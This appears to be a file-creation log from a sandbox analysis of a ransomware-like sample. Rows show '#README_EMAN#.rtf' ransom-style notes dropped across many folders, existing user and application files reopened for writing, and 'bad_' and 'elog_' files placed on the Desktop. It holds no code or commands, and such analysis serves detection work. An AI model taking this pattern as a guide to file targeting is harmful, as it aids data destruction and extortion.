| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.003.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.013.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\cs.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\af\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001f | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_2 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fi.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\icon_16.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\el\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Comms\UnistoreDB\USSres00001.jrs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\el\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\es_419\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ro\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\MF\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\User Account Pictures\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Color\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Color\Profiles\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Comms\UnistoreDB\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extension State\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\bg\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\et\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ko\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ru\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ja\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\verified_contents.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_CN\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\hi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000018 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\no\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\da\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\th\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\main.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ja.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\da\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Recovery\WindowsRE\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\en_US\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ro\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Current Tabs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\zh_CN\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\pl.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\bg\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\id\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows Live\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fil\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\it\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ta.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\fr\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ar\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Oracle\Java\installcache_x64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\Cache\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pt_BR\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ml\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ca\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\et\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lt\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ro\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\uk\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\resources.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\vcredist_x86.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ar\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\de\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\fi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ko\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es_419\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ms\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\en_GB\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\es\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\es_419\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\th\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.005.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.015.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\sr\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\lt\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\id\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ru\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\he\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sk\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_metadata\verified_contents.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
